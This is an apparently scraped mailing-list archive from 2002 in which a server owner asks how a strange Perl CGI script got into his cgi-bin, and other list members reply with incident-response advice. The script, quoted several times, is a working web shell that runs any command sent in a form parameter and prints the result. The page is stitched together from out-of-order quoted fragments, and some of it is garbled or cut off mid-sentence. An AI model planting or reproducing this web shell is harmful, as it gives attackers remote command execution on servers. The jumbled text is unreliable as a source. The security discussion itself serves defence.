At 14:15 21.03.2002 -0600, you wrote:
Any idea as to how it got on my server. It is owned by apache and in the
apache group. That tells me that it was put on there by apache. It is in a
directory that has the permissions 777 because the script that is normally
in there keeps and writes traffic
Assuming the content isn't updated too often, burning
the site from a test area and mounting it as a CDROM
makes it pretty hard for outsiders to udpate.
--
Steven Lembark 2930 W. Palmer
Workhorse Computing Chicago, IL 60647
http://www.chkrootkit.org/
http://www.incident-response.org/LKM.htm
--
Carsten Heinrigs
Ocean-7 Development
Tel: 212 533-7883
Chris Reinhardt wrote:
On Thu, 21 Mar 2002, John Michael wrote:
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param(g);
my $a=param(s);
if ($a || $k) {
$l=`$k 21`;
print start_form,textarea(g,$k,1,50);
print submit(sc);
print end_form;
print pre($l);
}
print
Any idea as to how it got on my server. It is owned by apache and in the
apache group. That tells me that it was put on there by apache. It is in a
directory that has the permissions 777 because the script that is normally
in there keeps and writes traffic information, so I guess someone found
John Michael wrote:
Any idea as to how it got on my server.
Someone found a serious security hole in something you're running. You
have to assume that your server has been completely compromised and that
the entire world now has root access to it through a hundred backdoors
they installed.
PROTECTED] (bcc: Wesley
Sheldahl/Lex/Lexmark)
Subject: Re: Off topic question a little worried
John Michael wrote:
Any idea as to how it got on my server.
Someone found a serious security hole in something you're running. You
have to assume that your server has been completely
Hi there,
On Thu, 21 Mar 2002, John Michael wrote:
Any idea as to how it got on my server.
Nope. There are a thousand ways it could have been done if your
server is not carefully secured. Do waht Perrin said - take it
offline, it can't be trusted - and read the CERT stuff that you've
been
At 4:58 PM -0500 3/21/02, darren chamberlain wrote:
Another alternative is to replace it with something that appears
to do the same thing, but actually logs a ton of stuff from the
requestor.
Unless the entire site has already been backdoored. If that is the
case, then this would serve no
-- Perrin Harkins [EMAIL PROTECTED] on 03/21/02 17:07:27 -0500
darren chamberlain wrote:
Another alternative is to replace it with something that appears
to do the same thing, but actually logs a ton of stuff from the
requestor.
You can't trust any part of compromised box, right down to
Chris Reinhardt wrote:
On Thu, 21 Mar 2002, John Michael wrote:
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param(g);
my $a=param(s);
if ($a || $k) {
$l=`$k 21`;
print start_form,textarea(g,$k,1,50);
print submit(sc);
print end_form;
print pre($l);
}
print
Hi
I found this script in one of my cgi-bin's.Not sure where it came from.
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param(g);
my $a=param(s);
if ($a || $k) {
$l=`$k 21`;
print start_form,textarea(g,$k,1,50);
print submit(sc);
print end_form;
On Thu, 21 Mar 2002, John Michael wrote:
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param(g);
my $a=param(s);
if ($a || $k) {
$l=`$k 21`;
print start_form,textarea(g,$k,1,50);
print submit(sc);
print end_form;
print pre($l);
}
print
13 matches
Mail list logo